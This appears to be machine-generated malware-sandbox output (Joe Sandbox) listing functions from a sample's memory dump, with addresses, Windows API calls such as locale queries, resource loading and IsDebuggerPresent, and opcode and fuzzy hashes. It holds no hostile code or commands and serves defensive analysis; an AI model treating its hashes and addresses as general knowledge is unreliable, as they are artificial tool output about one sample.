                                                                  • Opcode ID: 281e2ee71b3424083d6082044a1d6be1ef748fb31d338298ddbbb0e9b8bc06ca
                                                                  • Instruction ID: ec54656e9dfe92c1d46d35ebccf7d3be00980df13ce8d6233867bc5f6114b929
                                                                  • Opcode Fuzzy Hash: 281e2ee71b3424083d6082044a1d6be1ef748fb31d338298ddbbb0e9b8bc06ca
                                                                  • Instruction Fuzzy Hash: 0BE06D702047618FE360AF28F418B477AE0AF15708F0088DDE459D32A0DFB9D4898BA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E28B
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E2D5
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E39B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 661929714-0
                                                                  • Opcode ID: 1d6187ca426f47199ff1a484226a1f59bd393a5956546445f3be718f71f9d6b4
                                                                  • Instruction ID: dc2b222ab034e9080c92417f434b1dc79164ddbd399ef33ccd3c92fe1f26f6d1
                                                                  • Opcode Fuzzy Hash: 1d6187ca426f47199ff1a484226a1f59bd393a5956546445f3be718f71f9d6b4
                                                                  • Instruction Fuzzy Hash: 536180715402079BEB2D9F24CC82BAA77E8EF18302F1041F9ED25D7285EB74DA89DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B46E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B46F13
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B46F1D
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B46F2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 616dbfac943d6275678d34f454b7d4ac78280ee0d2678292efa818f69c02ed5d
                                                                  • Instruction ID: a68a21b6fb7e5fa9572e06962d3d779a9886aa3f73f5c267ab0103f93e56eeca
                                                                  • Opcode Fuzzy Hash: 616dbfac943d6275678d34f454b7d4ac78280ee0d2678292efa818f69c02ed5d
                                                                  • Instruction Fuzzy Hash: 3D31C374901228ABCB21DF64D9897CDBBF8BF18310F5041EAE51CA7290EB749F859F45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B245B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadResource.KERNEL32(00000000,00000000,823FDEC6,00000001,00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?), ref: 00B245DB
                                                                  • LockResource.KERNEL32(00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?,?,?,?,00B23778), ref: 00B245E6
                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?,?,?), ref: 00B245F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$LoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 2853612939-0
                                                                  • Opcode ID: 33fdcd0c17629a3a6bb51b6c37bb3d5c1a828ac094ad8ea60276c0181a0fe11e
                                                                  • Instruction ID: 1f08b875ae7e0f77d86511838519968f2ad6e82db2632fb9a70362db51223429
                                                                  • Opcode Fuzzy Hash: 33fdcd0c17629a3a6bb51b6c37bb3d5c1a828ac094ad8ea60276c0181a0fe11e
                                                                  • Instruction Fuzzy Hash: 2C11A732A046649BC7368F59ED45B66B7E8E786B15F0005AEEC1DD3690EF799C00C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                  • Instruction ID: 77ec6beb38a656342f9c4533b01f62eabc9b3fc070f5d775ab208310669303a8
                                                                  • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                  • Instruction Fuzzy Hash: 74F13071E012199FDF14CFA8D9806ADB7F1FF98324F1582A9E825A7381D730AE05DB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B57B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B57F64,00000000,00000000,00000000), ref: 00B57E23
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InformationTimeZone
                                                                  • String ID:
                                                                  • API String ID: 565725191-0
                                                                  • Opcode ID: 16fb0c920ceabaf48fe9a4549fc799f4e78b8748d54ba036da8bd47680065f15
                                                                  • Instruction ID: 3b7d70fbaebe9c0d000bbf597ec36c500e1691f1ea15067dce6c7eb4cbf2e712
                                                                  • Opcode Fuzzy Hash: 16fb0c920ceabaf48fe9a4549fc799f4e78b8748d54ba036da8bd47680065f15
                                                                  • Instruction Fuzzy Hash: B1C1F372A44215ABDB20AB64AC02BBE7BF9EF04751F5440E6FD05AB291EF708E45C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B584BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B584B8,?,?,00000008,?,?,00B614E4,00000000), ref: 00B586EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: 276dd20613d482c36fa10ee4a891dd2d592877af1aaba0824fc0f69f6b095c6a
                                                                  • Instruction ID: 255aed580ba6c4b16c3549975f44925624c1bd9a9b19a8674e21910fce2ba33b
                                                                  • Opcode Fuzzy Hash: 276dd20613d482c36fa10ee4a891dd2d592877af1aaba0824fc0f69f6b095c6a
                                                                  • Instruction Fuzzy Hash: 6CB12931210605CFD715CF28C486B657BE0FB49366F2586D8E89ADF2A1CB35ED96CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B435A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B435BF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 67451ce657776dd652e692be3940fd20b605a1ceb5597244a4ece48d8ef88d44
                                                                  • Instruction ID: 0b700070b5b781225d85bdc87539cc019b0124c8f4f3ad7e0e73508ceaab63ad
                                                                  • Opcode Fuzzy Hash: 67451ce657776dd652e692be3940fd20b605a1ceb5597244a4ece48d8ef88d44
                                                                  • Instruction Fuzzy Hash: 4B518BB1A04215CBEB25CF58D881BAABBF0FB04754F18806EC449EB350D774AE80DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25f96ebe93ab791b49f6ff6eab489074789be56cb981823b2d621030916e6f02
                                                                  • Instruction ID: bf34b3533ea32f306adf6c7fedc29d850b1d420888d52d323a1ef07ee27895ce
                                                                  • Opcode Fuzzy Hash: 25f96ebe93ab791b49f6ff6eab489074789be56cb981823b2d621030916e6f02
                                                                  • Instruction Fuzzy Hash: 6D31D772900319AFDB20DFA9CC85EBBB7ADEB84311F1442D9FD15D7240EA30AE448B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4A587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 946e30ca64de258661333a4a20cc175995373d6fa3b952e291408ab08c9d16c4
                                                                  • Instruction ID: 27fc5834567c9d9a18f931fae28b923a55b14397988f1d4e022830279f83146e
                                                                  • Opcode Fuzzy Hash: 946e30ca64de258661333a4a20cc175995373d6fa3b952e291408ab08c9d16c4
                                                                  • Instruction Fuzzy Hash: 97C1BF709806468FCB28CF28C590A7EBBF1FF55310F284699D4969B291C731EF46EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E4DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 477bc9368b7f7f870cfecd57a10df4132ac27e11fddc76c94d575f7916e5e0d2
                                                                  • Instruction ID: a6f0a42eb9579f40326cfb46a4706e21244642cbcf7dc665039dfa512aaa7a43
                                                                  • Opcode Fuzzy Hash: 477bc9368b7f7f870cfecd57a10df4132ac27e11fddc76c94d575f7916e5e0d2
                                                                  • Instruction Fuzzy Hash: 7321A172644206ABDB29AE24EC42B7A73E8EB14316B1000FAFD15D6141FB74EE08D750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E237,00000001,00000000,?,-00000050,?,00B5E868,00000000,?,?,?,00000055,?), ref: 00B5E183
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 88bf93d3225de58944b0f24af95cc37d93a8258daa166350d669bf6e3f1718c4
                                                                  • Instruction ID: 00f3b9daf96ddfe2a7b0402314ea9b62114b3238563676398fd3daa3ada9e49e
                                                                  • Opcode Fuzzy Hash: 88bf93d3225de58944b0f24af95cc37d93a8258daa166350d669bf6e3f1718c4
                                                                  • Instruction Fuzzy Hash: E811293B2007019FDB1C9F39C8916BAB7D2FF8472AB1544ACE95697A40D771BA46CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B5E453,00000000,00000000,?), ref: 00B5E6E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 202a08fef2a97f11d526219112f2e3eaf645956a04e81bb29393bed666ed2e08
                                                                  • Instruction ID: 4c6e9fe224912c38866b739a73f1ed8aa80ad326e1183aaa60c226da8b9c5502
                                                                  • Opcode Fuzzy Hash: 202a08fef2a97f11d526219112f2e3eaf645956a04e81bb29393bed666ed2e08
                                                                  • Instruction Fuzzy Hash: AFF0A936600212BBDB2C5B648C45BBA77D8EB44755F1504E5EC25A3180EA74FF45C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E48A,00000001,?,?,-00000050,?,00B5E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B5E1F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: b2b6377b4c277a967764adf5c16346246cbee042b8319c3c73eccdc2b7e2b73a
                                                                  • Instruction ID: 4ea9f47d596a0ee2d5a9f5078194967b807df0594bd57a3ceb288f8e5c4280ea
                                                                  • Opcode Fuzzy Hash: b2b6377b4c277a967764adf5c16346246cbee042b8319c3c73eccdc2b7e2b73a
                                                                  • Instruction Fuzzy Hash: FBF046362007045FCB285F358C85B7A7BD5EF80729F0484ECFD158B680C6B1ED02CA50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B57132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B51C9A: EnterCriticalSection.KERNEL32(-00B7DE50,?,00B53576,?,00B7A078,0000000C,00B53841,?), ref: 00B51CA9
                                                                  • EnumSystemLocalesW.KERNEL32(00B57125,00000001,00B7A1D8,0000000C,00B57554,00000000), ref: 00B5716A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                  • String ID:
                                                                  • API String ID: 1272433827-0
                                                                  • Opcode ID: de2cddbf813f5fc4bb07e92a537183922395043ba4a333bbf95ee62a89b5e75d
                                                                  • Instruction ID: 44c620381652a4af1a7e61e85d529ef820f0ee0ac33e84e4f8c04b539c8b2d7d
                                                                  • Opcode Fuzzy Hash: de2cddbf813f5fc4bb07e92a537183922395043ba4a333bbf95ee62a89b5e75d
                                                                  • Instruction Fuzzy Hash: 9DF04972A44204DFE700DFA8E846B9C77F0FB49726F0085DAF814EB2A0DB7599449F80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E01F,00000001,?,?,?,00B5E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B5E0FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 4649c46a93505f497fbcedc8b569a93a7bfc4ea932923bfdedaa07b4d3a2785b
                                                                  • Instruction ID: 548b0c173b4c89747a91cb97c763557a3bf1d41d27ec581a9fb27332c6569063
                                                                  • Opcode Fuzzy Hash: 4649c46a93505f497fbcedc8b569a93a7bfc4ea932923bfdedaa07b4d3a2785b
                                                                  • Instruction Fuzzy Hash: 52F0553A30020597CB08AF35CC4676A7FD4EFC1762F0A00D8EE15CB290C6B1D986C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B423F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00B400E2,00000000,00000000,00000004,00B3ED14,00000000,00000004,00B3F127,00000000,00000000), ref: 00B42410
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 12fc263d4af4420116ed80d0387e147840a6c111e6867e92ebbc0b7ff33c04a1
                                                                  • Instruction ID: 30821472b4f28e51d95242a862c9402a84bd5701628e575f94626a81bb0a733e
                                                                  • Opcode Fuzzy Hash: 12fc263d4af4420116ed80d0387e147840a6c111e6867e92ebbc0b7ff33c04a1
                                                                  • Instruction Fuzzy Hash: 96E0D832794104B6D7154B7C9E0FFBA76DCD70170AF9041D1FA02E51D1DAA1CB00B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B576AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
